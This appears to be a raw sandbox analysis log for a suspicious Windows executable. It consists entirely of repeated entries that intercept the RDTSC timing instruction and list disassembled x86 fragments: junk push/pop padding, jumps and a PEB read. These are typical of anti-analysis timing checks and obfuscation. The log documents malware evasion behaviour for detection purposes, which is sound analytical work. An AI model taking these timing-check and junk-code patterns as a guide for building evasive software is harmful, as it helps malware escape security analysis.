Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F36A7 second address: 10F36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA83h 0x00000009 pop edx 0x0000000a jnl 00007F6184CCBA8Fh 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F6184CCBA76h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F36E8 second address: 10F36EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F3244 second address: 10F3248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F3248 second address: 10F325C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F6184834896h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F33BE second address: 10F33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F33C4 second address: 10F33D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6184834896h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144E96 second address: 1144E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144E9A second address: 1144E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144E9E second address: 1144EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144EA4 second address: 1144EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1209E98 second address: 1209EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6184CCBA76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1209FF3 second address: 1209FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6184834896h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A5D0 second address: 120A5D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A5D9 second address: 120A5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A5DF second address: 120A5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007F6184CCBA76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A763 second address: 120A787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F6184834896h 0x00000010 jmp 00007F61848348A3h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A787 second address: 120A798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Ah 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A798 second address: 120A7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6184834896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120C615 second address: 120C61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120C61B second address: 120C61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120C61F second address: 120C62E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6184CCBA76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120F06C second address: 120F072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120F072 second address: 120F08E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F6184CCBA7Bh 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120F5F7 second address: 120F67E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 jnp 00007F61848348A7h 0x0000000e jmp 00007F61848348A1h 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F6184834898h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2F4Ch], ecx 0x00000035 mov dx, 644Ah 0x00000039 push dword ptr [ebp+122D31EFh] 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F6184834898h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 mov dx, 2A43h 0x0000005d push 1B120825h 0x00000062 pushad 0x00000063 jbe 00007F6184834898h 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b push ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1210A38 second address: 1210A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0014 second address: 6FD0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0018 second address: 6FD001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD001C second address: 6FD0022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0022 second address: 6FD0051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6184CCBA88h 0x00000009 sbb cx, D498h 0x0000000e jmp 00007F6184CCBA7Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0051 second address: 6FD00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F61848348A5h 0x0000000f xor ecx, 1A245A36h 0x00000015 jmp 00007F61848348A1h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F61848348A0h 0x00000021 or al, 00000058h 0x00000024 jmp 00007F618483489Bh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push ecx 0x00000032 pop edi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD00B1 second address: 6FD00DE instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6184CCBA84h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a movsx edx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD00DE second address: 6FD0131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d jmp 00007F618483489Ch 0x00000012 mov ch, 5Bh 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007F618483489Ah 0x0000001b mov dword ptr [esp], ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F61848348A7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0131 second address: 6FD0152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov eax, 22882787h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [eax+10h] 0x00000010 jmp 00007F6184CCBA7Ah 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0152 second address: 6FD016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD016F second address: 6FD0175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0175 second address: 6FD021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F61848348A6h 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 push esi 0x00000011 jmp 00007F618483489Dh 0x00000016 pop ecx 0x00000017 mov ah, dh 0x00000019 popad 0x0000001a mov esi, dword ptr [759B06ECh] 0x00000020 jmp 00007F61848348A8h 0x00000025 test esi, esi 0x00000027 jmp 00007F61848348A0h 0x0000002c jne 00007F618483579Ah 0x00000032 jmp 00007F61848348A0h 0x00000037 xchg eax, edi 0x00000038 pushad 0x00000039 mov ax, D73Dh 0x0000003d mov ebx, esi 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F618483489Fh 0x00000046 xchg eax, edi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F61848348A2h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD021D second address: 6FD0251 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6184CCBA7Eh 0x0000000c and esi, 4E8A52A8h 0x00000012 jmp 00007F6184CCBA7Bh 0x00000017 popfd 0x00000018 popad 0x00000019 call dword ptr [75980B60h] 0x0000001f mov eax, 75F3E5E0h 0x00000024 ret 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0251 second address: 6FD0257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0257 second address: 6FD025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD025D second address: 6FD0261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0261 second address: 6FD0265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0265 second address: 6FD02C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007F61848348A0h 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F618483489Eh 0x00000017 jmp 00007F61848348A5h 0x0000001c popfd 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007F618483489Ah 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F618483489Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD02C7 second address: 6FD02CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD02CB second address: 6FD02D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD02D1 second address: 6FD02FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6184CCBA87h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD036E second address: 6FD03B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F618483489Eh 0x00000010 test esi, esi 0x00000012 jmp 00007F61848348A0h 0x00000017 je 00007F61F3193B99h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD03B4 second address: 6FD041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6184CCBA87h 0x00000012 adc eax, 409C3E5Eh 0x00000018 jmp 00007F6184CCBA89h 0x0000001d popfd 0x0000001e mov bx, ax 0x00000021 popad 0x00000022 mov dword ptr [esi], edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, DDCAh 0x0000002b mov ebx, 77190C96h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD041A second address: 6FD0420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0420 second address: 6FD04B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 call 00007F6184CCBA7Ch 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 call 00007F6184CCBA81h 0x0000001e pushfd 0x0000001f jmp 00007F6184CCBA80h 0x00000024 sbb ecx, 4287B648h 0x0000002a jmp 00007F6184CCBA7Bh 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov dword ptr [esi+08h], eax 0x00000035 jmp 00007F6184CCBA7Fh 0x0000003a mov dword ptr [esi+0Ch], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6184CCBA85h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD04B3 second address: 6FD04E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F618483489Eh 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD04E2 second address: 6FD04E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD04E6 second address: 6FD0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0503 second address: 6FD057B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F6184CCBA83h 0x0000000c jmp 00007F6184CCBA83h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [ebx+50h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6184CCBA84h 0x0000001f xor ah, 00000058h 0x00000022 jmp 00007F6184CCBA7Bh 0x00000027 popfd 0x00000028 pushad 0x00000029 movzx ecx, bx 0x0000002c movsx edx, si 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [esi+14h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dx, 242Ah 0x0000003b jmp 00007F6184CCBA7Bh 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD057B second address: 6FD0593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0593 second address: 6FD061C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b jmp 00007F6184CCBA87h 0x00000010 mov dword ptr [esi+18h], eax 0x00000013 jmp 00007F6184CCBA86h 0x00000018 mov eax, dword ptr [ebx+58h] 0x0000001b pushad 0x0000001c mov si, 5DFDh 0x00000020 push ecx 0x00000021 pop esi 0x00000022 popad 0x00000023 mov dword ptr [esi+1Ch], eax 0x00000026 jmp 00007F6184CCBA7Bh 0x0000002b mov eax, dword ptr [ebx+5Ch] 0x0000002e jmp 00007F6184CCBA86h 0x00000033 mov dword ptr [esi+20h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F6184CCBA87h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD061C second address: 6FD0674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F61848348A5h 0x0000000b and eax, 7A353A86h 0x00000011 jmp 00007F61848348A1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d jmp 00007F618483489Eh 0x00000022 mov dword ptr [esi+24h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F618483489Ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0674 second address: 6FD0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0678 second address: 6FD067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD067E second address: 6FD06AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6184CCBA87h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD06AC second address: 6FD06DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F618483489Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD06DB second address: 6FD0702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6184CCBA7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0702 second address: 6FD0708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0708 second address: 6FD0738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6184CCBA80h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0738 second address: 6FD0747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0747 second address: 6FD075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD075F second address: 6FD0852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007F61848348A6h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 pushad 0x00000019 mov si, C20Dh 0x0000001d popad 0x0000001e mov ax, word ptr [ebx+00000088h] 0x00000025 pushad 0x00000026 mov ax, bx 0x00000029 popad 0x0000002a mov word ptr [esi+32h], ax 0x0000002e pushad 0x0000002f movsx edi, ax 0x00000032 mov edi, ecx 0x00000034 popad 0x00000035 mov eax, dword ptr [ebx+0000008Ch] 0x0000003b pushad 0x0000003c mov di, si 0x0000003f popad 0x00000040 mov dword ptr [esi+34h], eax 0x00000043 pushad 0x00000044 call 00007F61848348A1h 0x00000049 movzx eax, bx 0x0000004c pop edi 0x0000004d mov eax, 15B7CFC9h 0x00000052 popad 0x00000053 mov eax, dword ptr [ebx+18h] 0x00000056 jmp 00007F61848348A4h 0x0000005b mov dword ptr [esi+38h], eax 0x0000005e jmp 00007F61848348A0h 0x00000063 mov eax, dword ptr [ebx+1Ch] 0x00000066 pushad 0x00000067 mov dx, cx 0x0000006a mov ecx, 5227CC19h 0x0000006f popad 0x00000070 mov dword ptr [esi+3Ch], eax 0x00000073 jmp 00007F61848348A4h 0x00000078 mov eax, dword ptr [ebx+20h] 0x0000007b jmp 00007F61848348A0h 0x00000080 mov dword ptr [esi+40h], eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007F61848348A7h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0852 second address: 6FD087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+00000080h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F6184CCBA7Fh 0x00000019 pop eax 0x0000001a mov edx, 03FD7EACh 0x0000001f popad 0x00000020 rdtsc
